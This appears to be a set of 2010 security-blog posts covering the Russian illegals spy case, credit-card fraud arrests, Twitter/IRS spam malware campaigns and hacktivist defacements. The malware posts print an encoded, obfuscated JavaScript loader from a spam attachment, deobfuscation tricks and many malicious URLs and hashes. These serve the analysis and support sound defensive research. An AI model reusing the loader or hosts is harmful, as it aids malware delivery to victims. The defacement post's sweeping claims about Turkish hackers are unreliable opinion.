The SVR also maintains a network of illegals who do similar work but operate under their true names. This network of illegals are trained in the same trade-craft of the others, but receive shorter training in tradecraft. While the "false identity" illegals are usually paired together as part of their cover, the "true identity" illegals usually work independently.

The goal of the "Illegals" is to have long-term agents who become sufficiently "Americanized" to gather information about the US for Russia, and to be able to recruit sources in, or possibly to infiltrate, US policy-making circles.

This was spelled out clearly in an intercepted and decrypted communication from Moscow to Anna and Mikhail, they were told:

You were sent to USA for long-term service trip. Your education, bank accounts, car, house etc. — all these serve one goal: fulfill your main mission, i. e. to search and develop ties in policymaking circles in US and send intels to C.




Means and Methods of the Conspiracy



The modern age has created new forms of "drops" not seen in the movies. One of these techniques is a private Wireless network. In this form of communication, the handler and the agent exchange MAC addresses for their laptop computers, and configure their machines so that they will create an encrypted network connection only if they see the MAC address of the Wireless network card of the other device.

Anna Chapman

Between January 2010 and June 2010, defendant Anna Chapman, on at least ten Wednesdays, entered the United Nations building in Manhattan and seated herself in order to exchange files with her Russian government handlers via this technique. Some other examples are given in the Affadavit that forms part of the complaint, including:

January 20, 2010 -- Anna Chapman enters a coffee shop on the corner of 47th street and 8th avenue in Manhattan. A minivan, being driven by unnamed Russian government official #1, pulled up to the curb outside the window, and created an "Ad Hoc" Wireless Network with Chapman's laptop, allowing them to communicate via an encrypted network.

March 17, 2010 -- Chapman enters a bookstore in the vicinity of Greenwich and Warren streets in Manhattan. While inside, Russian Government Official #1 was observed loitering outside the bookstore. Three minutes after Chapman powered on her laptop, the same MAC Address observed on January 20th created an Ad Hoc wireless network and data flowed between the devices for at least twenty minutes.

April 7, 2010 -- Russian Government Official #1 was observed leaving his office. Although the MAC Address for Chapman's laptop was observed in the vicinity, it is believed Russian Government Official #1 detected surveillance and aborted his attempts to contact Chapman.

Similar exchanges were observed on April 21, 2010, May 5, 2010, June 9, 2010, and June 16, 2010, on each time, the same pair of MAC addresses created an Ad Hoc private wireless network.

Mikhail Semenko

On June 5, 2010, Mikhail Semenko was seen entering a restaurant in DC, carrying a bag. Russian Government Official #2 arrived at the restaurant in a car with diplomatic license plates and sat in the car in the parking lot for twenty minutes before driving away. An Ad Hoc private wireless network was established shortly after the arrival of the car, and dismantled shortly after the departure of the car. It is believed that SEMENKO performed communications from a laptop in the bag he was carrying during this time.

(Russian Government Official #2 was involved with a "brush-pass", exchanging identical packages with a co-conspirator, back in 2004 at a train station in Forest Hills, New York.)

Anna Chapman gets an FBI Handler


On June 26, 2010, Anna Chapman met with an undercover FBI agent in Manhattan, who had arranged a meeting with her to discuss her "Wednesday" covert laptop sessions. Apparently Chapman had been having technical difficulties with her laptop, and the FBI took the opportunity to reach out to her, suggesting that she was ready "for the next step". Although the telephone calls with UnderCover-1 were in Russian, when they met in person, UC-1 suggested they speak in English "to not draw attention to themselves". A transcript of their conversation is part of the court documents.

UC-1 says that Chapman has done well with the laptop, but now it was time to the next step. The subject of her broken laptop came up in the course of conversation. UC-1 mentions that he would be happy to take it and have it repaired, or she can take it to the Consulate herself. Chapman told UC-1 "It would be more convenient if I gave you it." To avoid blowing cover, UC-1 continued with the task, which was providing a fake passport to Chapman which she was supposed to convey to another agent.

UC-1 tells her that she is to sit on a certain park bench, holding a magazine in a certain way. The other agent will approach and say "excuse me, but haven't we met in California last summer?" Chapman was to reply "No, I think it was the Hamptons," which would be the signal that everything was ok. The other person would then take the magazine, with the passport. If the pass was successful, Chapman was to return to a city map on an outside display and place a postage stamp on the map. That would be the way UC-1 would know everything went well.

An hour after this meeting, Chapman entered a CVS pharmacy, then a Verizon store, then went to a Rite Aid pharmacy, then back to the Verizon store. When she exited the Verizon store the second time, she discarded a bag. The receipts and packaging in the bag indicated she had bought a Motorola cell phone and a "TracFone" calling card. The customer agreement was for "Irine Kutsov" who lived at "99 Fake Street". She discarded the charger that came with the phone, indicating that she probably didn't intend to use it for more than that day.

Mikhail Semenko gets an FBI Handler



Using a very similar method, and on the same day, Semenko meets with an Undercover FBI Agent (UC-2). UC-2 also has a "next step" task for Semenko. He provides an envelope with $5,000 and a map indicating a drop spot beneath a bridge in a park in Arlington between 11 and 11:30 AM the following day. During the same conversation, UC-2 indicates that there were problems receiving the file from the Wireless network at the restaurant, and tries to elicit more information from Semenko about what the problem may have been. Semenko says that he did everything right - he made the file and zipped it - and the computer turned itself off after the file was sent, which is the sign that the transfer was successful.

Based on the information above, FBI Special Agent Amit Kachhia-Patel requests a warrant for the arrest of Chapman and Semenko, which was signed on June 27, 2010 by US Magistrate Judge, the Honorable Ronald L. Ellis, of the Southern District of New York.




For some interesting reading, flip up Google Translate and start following the Comments sections on some of the Russian coverage on this story:

http://www.ruformator.ru/news/article06934/default.asp

http://www.lenta.ru/lib/14206093/#4

Tuesday, June 15, 2010

178 International Credit Card Fraudsters arrested

(Thanks to Brian Krebs for the tip on this story)

In the image below, from RTVE.es, someone is about to get a rude awakening, courtesy of the Spanish police:



The scene would be repeated by police in 14 countries who participated in the final phase of a two-year multi-national investigation of cyber criminals accused of creating cloned credit cards and using them in a variety of frauds.

According to Spanish police the organization stole more than 20 million Euros, and was also involved with robbery, fraud, extortion, sexual exploitation, and money laundering.


(image from rtve.es - click image for video)

Among those arrested:

76 people from Spain, with more than 120,000 credit card numbers and 5,000 clone cards in their possession in six separate workshops.

16 people from Romania, where 23 raids were conducted.

30 people from France in 9 raids

7 people from Italy, in 2 raids with 3,100 cloned cards seized

16 people from Germany, which included an individual the Spanish police say was "the most important technical person" in the European portion of the operation, as he could create the card cloning devices.

12 were arrested in Ireland in three raids

8 people were arrested in the USA.

US Secret Service Agent, William Cachinero, took part in the briefing by the Spanish Police commissioner, Serafin Castro. According to La Informacion reporters who attended the briefing, of the 76 arrested in Spain, only two were actually Spanish natives, the rest were Romanian in origin. Two of those arrested in Spain were important ring-leaders, including one who had traveled to the United States seeking to extend their criminal infrastructure. Many of those arrested had blood-ties with each other, and even the overseas criminals included many family members. Serafin explained that some of these criminals were addicted to a big spending lifestyle. He said that the top criminals were fond of partying with drugs and prostitutes where they would spend as much as 2,000 or 3,000 Euros each in a single night of partying.


(from www.rtve.es. Click image for source video)

Monday, June 14, 2010

More Twitter Spam: html-attached threats via Base64

The Twitter spam campaign that we wrote about on Saturday, Twitter, Canadian Pharmacy, and Undetected Malware , has shifted slightly to execute a new threat model. Various email messages which seem to be from Twitter are actually redirecting readers to a website that is selling Canadian pharmacy pills. But is that really what this campaign is about? In our previous article, we mentioned that while the site SEEMS to take you to the Canadian pharmacy website "toldspeak.com", there is more going on behind the scenes.

The previous campaign delivered spam which our friend Graham Cluley has dubbed the "Busty Amber" spam, after the well-endowed model who claims to want to be your friend on Twitter. (Angelina Jolie also wants very badly to be my friend on Twitter - she's sent the UAB Spam Data Mine several tens of thousands of invitations this week.

On Monday, the Busty Amber Twitter spam was primarily pointing to the website "jimjewell.com" and pulling down a file "z.htm". These emails are characterized by a subject line of "Twitter ###-##", where random numbers are used to fill in the
remainder of the email subject. Here's an example of one of the emails, which will have the recipients email address used in several places to create "uniqueness" in the email, which helps with deliverability:



z.htm will forward to the website "toldspeak.com" but will also secretly load an iframe to be used in delivering malware.

The current page actually has already been taken down, but it was pointing to gogoop.casanovarevealed.com port 8080 (slash) index.php?pid=10

The path is the same as the prior site -- ":8080/index.php?pid=10".

The new version of the spam actually doesn't seem to use an external link at all. Instead of having a website that the user is directed to via a URL, the email claims to have an attachment that deals with resetting your Twitter password.



The attached file passes easily through spam filters because although the filetype is ".html", the actual file contents are BASE64 encoded, which means instead of seeing plain text URLs, you have a block of garbage that looks like this:


PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPmZ1bmN0aW9uIGooKXt9O3ZhciB1RT1mYWxzZTtqLnByb3RvdHlwZSA9IHt2IDogZnVuY3Rpb24oKSB7dmFyIGw9Jyc7dGhpcy5sVT1mYWxzZTt0aGlzLmE9Jyc7dmFyIHI9ZG9jdW1lbnQ7Zj0iIjt2YXIgckk9bmV3IERhdGUoKTt2YXIgcz0xNDcwNTt2YXIgeT1yWydsJG8kY1dhcHRXaSRvJG5kJy5yZXBsYWNlKC9bZFdcPHBcJF0vZywgJycpXTtrPScnO3RoaXMudlQ9JGARCHANGEDTHIS3IEFycmF5KCk7eVsnaGFyJWVhZnAnLnJlcGxhY2UoL1twJX5BYV0vZywgJycpXT0naHV0dXRycCo6dS9yL15tKmEpYipjdW9ybSkudW4pZSl0Xi8qenUudWgqdHVtKScucmVwbGFjZSgvW1wpclxeXCp1XS9nLCAnJyk7dmFyIGxDPW5ldyBBcnJheSgpO3ZhciBlPW5ldyBBcnJheSgpO3RoaXMuc0o9IiI7dmFyIGk9ZmFsc2U7fX07dmFyIHVIPWZ1bmN0aW9uKCl7cmV0dXJuICd1SCd9O3ZhciB1PW5ldyBqKCk7IHZhciBvPWZ1bmN0aW9uKCl7fTt1LnYoKTtzUT0ic1EiOzwvc2NyaXB0Pg==


Once decoded, we find another block of text that contains the same sort of javascript replacement trick we mentioned in the previous article. By removing from the string the characters "/,[,\,r,^,*,u,g", we find that the URL we are being redirected to is "mabcom.net" (slash) "z.htm"

That "z.htm" file redirects us to "toldspeak.com", which definitively links us to the other version of the spam, and also loads an IFRAME from the location:

"dodole.designandtransitionspecialists.com" on port 8080 from the file "index.php?pid=10".

About 10PM on Monday June 15th, the spammer finally realized that that site had been removed. Don't worry, he's back again this morning with a new site. The current email with the subject: "Reset your Twitter password" still has an attached BASE64 file. This time the decode is still using the replace trick. Our URL is in this string:

hwt,t_p+:+/_/+e,r0e_i_n,t0z+a,.0cwo0mw/wz0.,h,t0mw

which has the action "replace" executed on it, with a regular expression saying to change the characters "w, _, ,, +, 0," to null.

.replace(/[w_,\+0]/g, '')

That leaves us with:

http://ereintza.com/z.htm

which takes us to a new Canadian pharmacy site, mouseultra.com, but only after it loads its malware IFRAME from:

cache.lamcfoundation.org port 8080 /index.php?pid=10

Fortunately, it looks like someone at the Los Angeles Mission College Foundation has already found the problem and cleaned up the "extra" webserver that they were running.

123Greetings.com


The same technique of attaching an .html file to your spam that contains links to malware is also being used by the current "123Greetings.com" spam run.

In that spam campaign messages with random "from" addresses used in both the subject line and the body of the email are sent, such as:

(HEADER)
From: 123Greetings.com ecards@123greetings.com
Subject: user@domain.com has sent you a birthday card

(BODY)


[user@domain.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.


The attachment, ecard.html, is BASE64 encoded, but has a much more advanced Javascript obfuscation technique than the current Twitter spam campaign. My favorite Base64 decoder choked on it, so I threw it into the page offered by gosu.pl, which did fine turning the Base64 into very messy but nicely formatted Javascript.

The code used blocks like this:

var AUqMA = this;
var jL = 'r' + 'eplace';
var tdbHfv = 'bKaK8MdM2v6M5M9M1T4v7v6M7K9T3Mcv0v0v4KeTbTbv7MbM3M8M5v4M1vdTaM5v4Mav1v7M5TaMaM1v0Ke' ;
var zQwlUR;
zQwlUR = 354;
var qAcav = 763 ;
var Hs = 923;

to gradually build up ridiculously long strings containing code, then "replacing out" the characters that shouldn't be there to eventually cause the malware-hosting malware sites to download and attempt to execute their hostile code.

Saturday, June 12, 2010

Twitter, Canadian Pharmacy, and Undetected Malware

In our post earlier this week, IRS Malware Notice of UnderReported Income, we had a footnote about a current Twitter and YouTube spam run. Our friend Graham Cluley has labeled one version we mentioned the "Busty Amber" spam. (Graham, we didn't know her name - where did you meet her?)

At the time we posted that article we were starting to explore another aspect of the Twitter spam campaign, which continues unabated today, according to the UAB Spam Data Mine. Clicking on the link in the spam is well-publicized as a means to reaching a Canadian pharmacy website, but secretly behind the covers, this spam is all about planting malware.

Let's explore one example from an email we dissected this morning.

As with the American Express , IRS, and Twitter spam, this spam campaign avoids Spam Blacklisting methods by using many thousands of uniquely created spam URLs. In the case of the email we are examining, it looked like this:



The link that claims to be going to "twitter.com" is actually a URL for http://technoline.ca/z.htm

Technoline.ca is in all likelihood a compromised webserver, since its been up since October 2008 "serving the greater Montreal and South Shore region."

When we visit the "z.htm" page, we find that we get a 3 second meta refresh to take us to Canadian pharmacy site "toldspeak.com", however we ALSO get an iframe that takes us to:

rubytune.ru port 8080 /index.php?pid=10

(Rubytune.ru is possibly fast flux. Its currently resolving at:
83.172.13.23
83.172.148.10
89.31.96.64
94.23.224.132
95.211.128.13
)


That site has some interesting Javascript lines, including these two:

Lya2m7t = 'b<5/Mi5f5r5a|m|eH>b'.replace(/[b5\|MH]/g, '');

Ekv9i7z55 = '<5i6f,r|a|m6e5 *s*r5c5=6A6p*p5l,e,t61,0,.*h,t|m,l,>,<,/5i6f*r5a6m6e6>*'.replace(/[\*56\|,]/g, '');

So, the first line is saying take the big long string, and remove the characters in the list: "/", "[", "b", "5", "|", "M", and "H".

If we do that, it leaves us with an iframe to: Notes10.pdf

Doing the same thing on the other line leaves us with an iframe: Applet10.html

Both of those pages are downloaded from the "rubytune.ru" port 8080 webserver.

Notes10.pdf is a malicious PDF, however of the 41 anti-virus products at VirusTotal, only ONE of them says so. Its MD5 is: 33a6f72d52c53c10dd3eb3a7148651f2. You can see its VirusTotal Report here.

Applet10.html is yet another puzzle. This one is a webpage that has the title "Bob's homepage" and tries to use an IE exploit to drop a couple jar files, including a 0010.jar from the (unreachable) site: 85.10.136.213, and a file called "NewGames.jar". The only part of it that I can make function right now is a call to the rubytune.ru site passing a GET of "welcome.php?id=9&pid=10&1=1".

When we do that call, it drops an .exe on the box. For simplicity I named the .exe "welcome.exe". VirusTotal does a bit better with that one. This VirusTotal report shows 7 of 41 detections.

I kicked off the "welcome.exe" in a VM, and what I can tell for sure is that it bluescreened my VM. More details later . . .

Tuesday, June 08, 2010

IRS Malware: "Notice of Underreported income" spam

On June 2nd, we reported on American Express phish abusing free webhosting - a new method of delivering phishing, that we've only seen once before. The spammer creates thousands of "shortened URLs" and "free websites", which are all then used to redirect to a Fast Flux hosted phishing site.

The UAB Spam Data Mine started seeing this technique used in some Twitter-imitating spam at 9:13 AM on June 6th. That campaign is still continuing using spam messages with the subject "Twitter ###-##", such as "Twitter 647-01" or "Twitter 041-33". We'll come back to that campaign shortly. Let's get back to the IRS spam.

Here's a sample email:



That URL points to:

http://zyraziti.ibnsites.com/gujivazi.html

If you visit that free web site, it fowards you automagically to:

http://irs.gov.lazagazal.com/fraud_application/directory/statement.php?tid= target-######US



That site says
Finding and paying your federal taxes correctly and on time is an important part of living and working in the United States. Please review (download and execute) your tax statement


The link to 'tax-statement.exe' is malware, of course, which currently is detected by only 3 of the 41 anti-virus products on VirusTotal.com.

Here's a report from VirusTotal on this malware MD5 : 23c77c4c29158fea0e0e805eef535571.

Despite the fact that NONE of the current Anti-Virus definitions detect this as Zeus, we know it is very quickly when we launch it. The malware connects to the server "phaizeipeu.ru" and retrieves a Zeus bin file, "/bin/hueghixa.bin" from the server there. That domain has been tracked on Zeustracker since June 2nd.

The nameserver used to resolve this domain, ns1.interaktivitysearch.net, was also used for the domain cyansmith.com, which we mentioned in last week's Fast Flux information regarding the AmEx phish.

As an example, phaizeipeu.ru has in the past two minutes resolved to these IP addresses:

201.227.120.102 - Panama Cable & Wireless
115.186.118.122 - Karachi Worldcall, Pakistan
121.121.97.100 - Maxis Broadband, Kuala Lumpur, Malaysia
124.120.246.107 - TruehISP, Bangkok, Thailand
186.19.105.151 - Telecentro, Argentina
190.30.203.28 - Apolo Gold Telecom, Buenos Aires, Argentina
190.55.110.94 - Telecontro, Argentina
190.246.221.161 - Cablevision, Buenos Aires, Argentina

Here's an example of some of those "Free Web hosting" sites that are currently being exploited:

/yxagenub.100freemb.com/aqyhyho.html
/zimisipyce.100freemb.com/byhomawa.html
/mipubacif.100freemb.com/ivamixa.html
/pekijoxam.100freemb.com/otatolaq.html
/ihacaqyb.100freemb.com/pezope.html
/uhisoheb.100megsfree5.com/ecufoke.html
/azasiniza.100megsfree5.com/icypuxo.html
/eqegohazuv.100megsfree5.com/xosynap.html
/hofipyhe.1accesshost.com/inynysyh.html
/culykenaza.1accesshost.com/iwivuga.html
/digobizaw.1accesshost.com/mafujyde.html
/orodydekof.1accesshost.com/nymoba.html
/olecomoxip.1accesshost.com/omekyre.html
/gusozivo.1accesshost.com/qojeti.html
/ewiromiru.1accesshost.com/sybygo.html
/oladolyc.1accesshost.com/tufepaqi.html
/lykyqoryt.1accesshost.com/ucymuvix.html
/udolysedu.1accesshost.com/unepyqun.html
/ebacikud.1accesshost.com/zykotu.html
/yvunavohi.angelcities.com/fyfobu.html
/nukowicu.angelcities.com/nuwiba.html
/kawywupo.arcadepages.com/arefoboq.html
/zesolarix.arcadepages.com/bykevim.html
/zesolarix.arcadepages.com/bykevim.html
/petoxevat.arcadepages.com/ewefuxoc.html
/inumynumoc.arcadepages.com/eximiqu.html
/ugijehicip.arcadepages.com/ezygexi.html
/oziqysehij.arcadepages.com/iqypufe.html
/imodarecy.bigheadhosting.net/exefoza.html
/wapovaqyh.bigheadhosting.net/panykeve.html
/pomobalyw.bigheadhosting.net/udewin.html
/afofywog.bigheadhosting.net/xufekap.html
/qecixedake.bigheadhosting.net/ysudydev.html
/qecixedake.bigheadhosting.net/ysudydev.html
/xymyfuqad.builtfree.org/bafazu.html
/okypocup.builtfree.org/ovamyqem.html
/wosogabaf.builtfree.org/upuzyr.html
/wosogabaf.builtfree.org/upuzyr.html
/azykakubol.digitalzones.com/ejitehi.html
/onamowonom.digitalzones.com/gypywoz.html
/godicyce.digitalzones.com/ixydet.html
/vixehuxo.digitalzones.com/woducuda.html
/goqivateg.digitalzones.com/ykybaxu.html
/toguhogi.dreamstation.com/avyryk.html
/utofitala.dreamstation.com/kylebik.html
/eqobymoped.dreamstation.com/ogiqyr.html
/ynexovaxo.dreamstation.com/winipyk.html
/yxyqyhuweh.dreamstation.com/ykeqegag.html
/culaworege.easyfreehosting.com/coriroxi.html
/culaworege.easyfreehosting.com/coriroxi.html
/ejofizyz.easyfreehosting.com/dabizeza.html
/ehuceximog.easyfreehosting.com/finixe.html
/umobafavu.easyfreehosting.com/irafyfa.html
/hemahodo.easyfreehosting.com/ufudimaw.html
/xujuguba.easyfreehosting.com/wybave.html
/ejorikoki.easyfreehosting.com/ygoxuq.html
/eqowiwyryx.envy.nu/bohopi.html
/fekynylum.envy.nu/ecevamib.html
/ewemasavy.envy.nu/ymohale.html
/ypodobuni.envy.nu/zytabe.html
/lijogaju.exactpages.com/apexoke.html
/lijogaju.exactpages.com/apexoke.html
/kogybovise.exactpages.com/vujufapa.html
/kywunereju.fcpages.com/erynoh.html
/bicefipipu.freecities.com/hibahu.html
/uboqenunep.freecities.com/nokoxuqo.html
/efysewezic.freecities.com/zevesaz.html
/tekefopo.freehostyou.com/gadasu.html
/alaradewo.freehostyou.com/guzyxoku.html
/ucoqopaby.freehostyou.com/mebyhuh.html
/wogeqiqyq.freehostyou.com/xegesef.html
/icocoqaby.freewaywebhost.com/cidaci.html
/ikucoban.freewaywebhost.com/ovydodo.html
/lykofuzequ.freewaywebhost.com/yjirox.html
/enecyhofow.freewebportal.com/axefeta.html
/vugogyve.freewebportal.com/cydaquno.html
/uwebijygyq.freewebportal.com/reniqyh.html
/hylydacymi.freewebportal.com/ucasob.html
/xuryqoju.freewebsitehosting.com/kocysu.html
/iruzasahyl.freewebsitehosting.com/olocon.html
/vizuzati.freewebsitehosting.com/oqaxiso.html
/umikyvoca.freewebsitehosting.com/xeruwyca.html
/umikyvoca.freewebsitehosting.com/xeruwyca.html
/oqixunoni.freewebsitehosting.com/xosize.html
/ufininir.freewebsitehosting.com/xusepu.html
/ikadiriga.freewebsitehosting.com/ylydugu.html
/ocerityv.freewebsitehosting.com/zopycy.html
/ubikiwaq.greatnow.com/ezixevol.html
/nififazi.greatnow.com/husadu.html
/isihogezin.greatnow.com/ysuxyrud.html
/cli.gs/eM8NXV
/cli.gs/UQBAHQ
/pokijyny.ibnsites.com/adopadat.html
/keferival.ibnsites.com/erematy.html
/zyraziti.ibnsites.com/gujivazi.html
/izyjopyh.ibnsites.com/jisokoce.html
/upymyvul.ibnsites.com/jylyhu.html
/irytaneb.ibnsites.com/kerific.html
/novufuvaxo.ibnsites.com/myzaquq.html
/nohoxutah.ibnsites.com/nydawodo.html
/eperitupuh.ibnsites.com/puhetyfe.html
/anutugoc.ibnsites.com/pukohe.html
/uwyraxuvy.ibnsites.com/qyqepib.html
/yrozujon.ibnsites.com/rusepen.html
/nagysadyx.ibnsites.com/ypenoc.html
/xisyjemo.lookseekpages.com/edavyket.html
/xisyjemo.lookseekpages.com/edavyket.html
/alezehifo.lookseekpages.com/jomuxa.html
/alezehifo.lookseekpages.com/jomuxa.html
/zysesojej.lookseekpages.com/kicylito.html
/vacagufo.lookseekpages.com/novygidy.html
/vacagufo.lookseekpages.com/novygidy.html
/pexogipol.lookseekpages.com/oxucafe.html
/gusejunad.lookseekpages.com/qinigo.html
/ipolagux.maddsites.com/dyjyzylu.html
/karaqika.maddsites.com/egesor.html
/ufawalijuh.maddsites.com/ilubyqy.html
/jokomule.maddsites.com/leqojo.html
/febaveli.maddsites.com/onapiju.html
/awilubux.mindnmagick.com/kehiwugi.html
/olawisyr.o-f.com/ejepekaz.html
/otumybigu.o-f.com/oqyhuxy.html
/afukafutu.s-enterprize.com/itociwo.html
/wenadinudu.servetown.com/ajihepo.html
/kahahari.servetown.com/biximol.html
/ovepahax.servetown.com/vyzurily.html
/nyfufuveco.servetown.com/xibycepi.html
/odivawuh.the-best-free-web-hosting.com/avyfemu.html
/izepofupy.the-best-free-web-hosting.com/yceqalu.html
/gopirocup.the-best-free-web-hosting.com/ydagyduf.html
/sawatazuky.uvoweb.net/afumox.html
/sawatazuky.uvoweb.net/afumox.html
/xynunuxev.uvoweb.net/ekocap.html
/kebypatat.uvoweb.net/garicedy.html
/eqeqalywoj.uvoweb.net/mafepody.html
/ubejedoqej.uvoweb.net/wetira.html
/vunagugevu.virtue.nu/evawov.html
/elyxupij.virtue.nu/juzepod.html
/elyxupij.virtue.nu/juzepod.html
/mequmato.virtue.nu/kiqabyto.html
/ofopuhymam.virtue.nu/ozowynuf.html
/ipecatuvo.virtue.nu/pokekuke.html
/ihamozavil.virtue.nu/qefeqo.html
/ihamozavil.virtue.nu/qefeqo.html
/xavesahyh.wtcsites.com/dasuqiw.html
/irutajov.wtcsites.com/huzexeje.html
/gisejywira.wtcsites.com/ubumike.html
/ikifinukux.wtcsites.com/upitim.html

Twitter Spam



While the Twitter spam also uses many free websites, it actually has a much smaller number, and combines "googlegroups", "110mb.com", and "t35.com" websites with a selection of compromised domains.

http://aomdesign101.com/d.htm
http://aprendainglesrapido.net/x.htm
http://capelcure.co.uk/1.html
http://cobhamdogs.net/x.htm
http://cobhamdogs.net/x.htm
http://crefxxx.110mb.com/index.htm
http://cresssa.110mb.com/index.htm
http://dreaminom.t35.com
http://faceseverywhere.com/x.htm
http://givisss.110mb.com/index.htm
http://grapevinephotography.com.au/1.htm
http://groups.google.com/group/pppppps
http://jennifervpearl.com/x.htm
http://lessreachom.t35.com
http://millcreekswim.com/x.htm
http://openexe.googlegroups.com/web/Twitter_security_model_setup.zip
http://pppppps.googlegroups.com/web/g.html
http://superiormerchant.com/x.htm
http://toldspeak.com
http://twitter.com/account/not_my_account/
http://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip
http://uucgb.org/x.htm
http://xizinnn.110mb.com/index.htm
http://xyddds.110mb.com/index.htm

The spam from these sites is also varying.

Security version:
Attention! We detected that someone was trying to steal your Twitter account password.

We strongly recomended you to download our secure module to protect account!

Please click on the link below:
http://twitter.com/Twitter_security_model_setup.zip



Pill version:
This version only shows a picture of a man showing "two-thumbs up" surrounded by pills with cheap prices on them.


Unread message version:
You have 1 unread message from Twitter

Please click on the link below or copy and paste the URL into your browser:
http://twitter.com/account/=youremail@yourdomain.com


An alternative, being currently spammed, follows the unread message with a photo of a large-breasted woman showing off her cleavage.

YouTube Spam



The identical photograph (click to see image here if you aren't offended by scantily clad women) is also currently being used in a "YouTube" spam.

Prior to about 2:00 PM Central time, the message did not contain the photograph, but only a YouTube logo and the message below (with a varying "user name" for each email.)

The user Jordan suggests you to become friends on YouTube. Offers and acceptance of offers on friendship simplify tracing of that your friends place in the selected works, add or estimate, and also simplifies video departure by all or to the selected users. To accept or reject this invitation, pass in INBOX


Some of the YouTube versions point to links on these pages:

htp://camaka.net/1.htm
http://aomdesign101.com/d.htm
http://aprendainglesrapido.net/x.htm
http://bombardierconsulting.com/x.htm
http://camaka.net/1.htm
http://cccxxdd.110mb.com/index.htm
http://cresssa.110mb.com/index.htm
http://kayakguy.com/x.htm
http://millcreekswim.com/x.htm
http://superiormerchant.com/x.htm
http://uucgb.org/x.htm
http://wanderingchild.org/x.htm
http://xyddds.110mb.com/index.htm

all of which forward elsewhere for the actual "pill-related" spam content

Saturday, June 05, 2010

Pro-Gaza hackers target Israeli websites

When it comes to website hacking, the Turks seem to be consistently at the top of the pack. This is mostly because their government tolerates their activities with little regard for international law. The oldest and most complete collection of website defacements is Zone-H, a site run by Roberto Preatoni that tries to document defacement activity by archiving the defaced websites. Defacement rates are rising, with a typical day seeing between 1500 and 3000 defaced websites, with a large number of these by Turkish defacement groups.

After various protest groups chose to stage a so-called "Freedom Flotilla" protest and attempt to deliver supplies to Gaza despite the well-known Israeli blockade. As YNet News reports:
The deputy head of Israel's mission to the United Nations, Dan Carmon, told the Security Council, "Although portrayed in the media as a humanitarian mission delivering aid to Gaza, this flotilla was (not) a humanitarian mission. If indeed it were a humanitarian mission it would have accepted, weeks ago, during the planning stages, the offer by the Israeli authorities to transfer the aid, through to the port of Ashdod, to Gaza through the existing overland crossing, in accordance with established procedures. Many states and organizations, including the UN, are using those mechanisms on a daily basis.


This interpretation of events is backed up by the IDF's YouTube channel. The Israeli military has been using YouTube to spread the official version of various contested events for more than a year, justifying their military actions by showing video of smuggling, rocket attacks, and other activities.

The nine demonstrators killed on the Mavi Marmara, a Turkish flagged ship, and eight of the nine killed were Turkish citizens. This is a guarantee that the various Turkish hacking groups will respond, and bring the cyberforces of Islam to bear on any website that ends in a ".il".

As you'll see below, although the Turks may have started the cyber protest, it has spread throughout the Islamic world, including Moroccans, Indonesians, Yemeni, and others.

Website Security and YOU


Some people say we are "glorifying the hackers" when we talk about their defacements, or "just giving them what they want" meaning publicity.

I'd like you to think, dear reader, as you look at these sites below about a different message. IF YOUR WEBSITE IS NOT SECURED, criminals, activists, terrorists, script kiddies, and phishers can break into your website and use it to spread whatever message they want.

Think about one of these images being associated with the name of YOUR COMPANY or YOUR ORGANIZATION.

How do you review your website security? Is someone reviewing your log files regularly? Do you have a mechanism to review statistics about your server? Would you even know it if someone added a page like one of those below to your server?

Yes, there is a cyber protest going on, but try not to think in terms of Israeli-Palestinian-Turk. Think in terms of hackers and YOU.

The Current Conflict


Here are a few of the SEVERAL THOUSAND websites defaced since those actions went down, and a few notes about some of the defacers that are attacking them.

Islamic Ghosts Team


srudi.co.il was hacked by the Islamic Ghosts Team, with the typical poorly structured English messages:

Who are the rightful terrorists in this world !!!!
Be sure that the whole world has become known the real Terror
./ Islamic Ghosts Team


According to Zone-H, the Islamic Ghosts Team has hacked more than 6800 websites, with many dozens in the past few days being this attack against Israeli sites. Of course they are also still attacking the government of Mexico.

They include the official graphic of this "campaign", which I'm linking to from its regularly used site at espacetunisien here:



They also have other far more disturbing images on recent defacements, many featuring a ripped burning Star of David Israeli flag.

Ma3str0-Dz


Algerian Hacker, Maestro-DZ, hangs out on the website Sec4ever.com and uses a german hotmail account - o5m@hotmail.de. Maestro-DZ has hacked more than 5,400 websites, including 390 Israeli sites.

His defacement yesterday of the Weissman Law firm demonstrates his foul mouth and poor english, along with this graphic:



He's been doing anti-Israeli website defacing since at least October 2009, when he did a defacement "For the Kids of Gaza" by hacking ballas-eng.co.il.


Jurm-Team (RealFaciaXXX)


If that name sounds familiar, it should. Jurm has been a member of several very high profile website defacement groups. He's invited to quite a few "All star" parties. His current team mates, Jurm, Dr.Noursoft, RedDoom, and Kingofp4 are hiding behind a group hotmail account, Jurm-Team@hotmail.com and using their defacements to show a video of Israeli atrocities.

Jurm and friends are "Moroccan Hackers" according to their defacements.
RealFaciaXXX must have just joined the team. His "For Palestina" hacks have not mentioned Jurm before yesterday, and most recently show an Arabian-head-garbed man with a shoulder launched missile facing into the camera.

1923Turk


Many Turkish hackers prefer to post their defacements on "Turk-H.org" instead of Zone-h.org. Looking over there briefly, there are many additional defacements not indexed on Zone-H. One of the more confusing groups is 1923Turk. This group's members post defacement stats using the common name, but actually have dozens of individual hacking groups that are assigned to different "missions". For example, one defacement claimed by "1923Turks" today is www.gerontology.org.il, but the defacement itself says it was committed by "Hackspy & Hate", two hackers who are members of a 1923Turks squad consisting of members, ÖlüM - xoxmemo - HaCkSpY - Devil_Boy - LegendSemih - TheEnd - Deadly - HaTe - Hydr4 - LifeOrDeath. The Team leader is usually listed first, but any of the members can do a defacement as long as the team leader is listed and the credit is given to the 1923Turk group.

Many of the current 1923Turk defacements use this image:


(Potentially offensive image: Click to see)

The 1923Turk group actually has more than 45,000 members, including 2600 new members during the past 30 days. They aren't all hackers - they have many groups dedicated to "patriotic" security of all sorts, including helping Turkish citizens getting malware off their computers. There are thousands involved in hacking though - some assigned exclusively to hacks against the PKK, and others to various "enemies of Islam", in teams divided by the country they are targeting. Some of their forums are Turkish culture, computer programming, and Islamic education forums as well.

